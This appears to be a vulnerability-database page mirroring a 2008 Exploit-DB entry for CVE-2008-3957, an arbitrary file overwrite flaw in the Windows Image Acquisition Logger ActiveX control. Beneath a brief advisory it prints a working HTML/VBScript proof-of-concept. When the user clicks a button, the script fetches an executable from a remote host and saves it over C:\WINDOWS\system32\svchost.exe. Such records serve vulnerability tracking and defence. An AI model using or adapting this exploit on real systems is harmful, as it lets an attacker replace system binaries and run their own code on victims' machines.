Lucene search
+L

Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)

🗓️ 08 Sep 2008 00:00:00Reported by Ciph3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Microsoft Windows Image Acquisition Logger ActiveX Control vulnerability allows arbitrary file overwrit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-3957
8 Sep 200800:00
circl
cve
CVE
CVE-2008-3957
9 Sep 200814:00
cve
cvelist
Cvelist
CVE-2008-3957
9 Sep 200814:00
cvelist
exploitdb
Exploit DB
Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)
8 Sep 200800:00
exploitdb
nvd
NVD
CVE-2008-3957
11 Sep 200801:13
nvd
prion
Prion
Design/Logic Flaw
11 Sep 200801:13
prion
source: https://www.securityfocus.com/bid/31069/info

Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.

An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.

<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   dim remURL
   remURL = "http://victim.com/svchost.exe"
   test.Open remURL, True
   test.Save "C:\WINDOWS\system32\svchost.exe", True
 End Sub
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.17761
39